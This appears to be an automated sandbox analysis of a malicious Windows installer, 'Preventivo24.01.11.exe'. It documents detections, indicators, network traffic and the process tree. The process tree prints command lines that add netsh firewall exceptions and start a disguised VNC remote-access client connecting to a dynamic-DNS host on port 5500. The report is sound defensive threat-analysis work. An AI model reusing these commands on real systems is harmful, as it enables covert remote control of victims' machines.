Edit tour

Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name:	Preventivo24.01.11.exe
Analysis ID:	1379424
MD5:	32f35b78a3dc5949ce3c99f2981def6b
SHA1:	18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:	0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags:	exe
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Contains VNC / remote desktop functionality (version string found)

Contains functionalty to change the wallpaper

Modifies the windows firewall

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Preventivo24.01.11.exe (PID: 5272 cmdline: C:\Users\user\Desktop\Preventivo24.01.11.exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B)

msiexec.exe (PID: 6552 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI=" MD5: 9D09DC1EDA745A5F87553048E57620CF)

viewer.exe (PID: 5504 cmdline: C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 1096 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4536 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 5808 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 3524 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

WMIC.exe (PID: 5736 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 4080 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Acrobat.exe (PID: 4428 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 3716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7296 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

viewer.exe (PID: 4592 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 6552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 4080 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)

cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7848 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 7928 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7936 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

mode.com (PID: 7960 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)

netsh.exe (PID: 8120 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

netsh.exe (PID: 7724 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

WMIC.exe (PID: 7816 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 7716 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

taskhost.exe (PID: 3992 cmdline: C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run MD5: 663FE548A57BBD487144EC8226A7A549)

viewer.exe (PID: 3840 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

viewer.exe (PID: 2584 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 4404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3636 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7352 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7376 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

WMIC.exe (PID: 5492 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 7860 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

timeout.exe (PID: 5360 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7840 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 4332 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 1288 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 7684 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7912 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 7312 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7756 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 7344 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7748 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Snort Signatures

ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) - Source IP: 192.168.2.5 - Destination IP: 93.184.216.34

Timestamp:	192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308
SID:	2834928
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT

Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: /User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: www.example.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 589411Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:07:53 GMTExpires: Tue, 30 Jan 2024 11:07:53 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2

Source: shi5398.tmp.0.dr	String found in binary or memory: http://.css
Source: shi5398.tmp.0.dr	String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2031375134.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.00000000054EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.2031997529.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033927327.00000000054B4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1996726609.0000000005591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b248e132c788
Source: shi5398.tmp.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://oneocsp.microe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcd.com0&
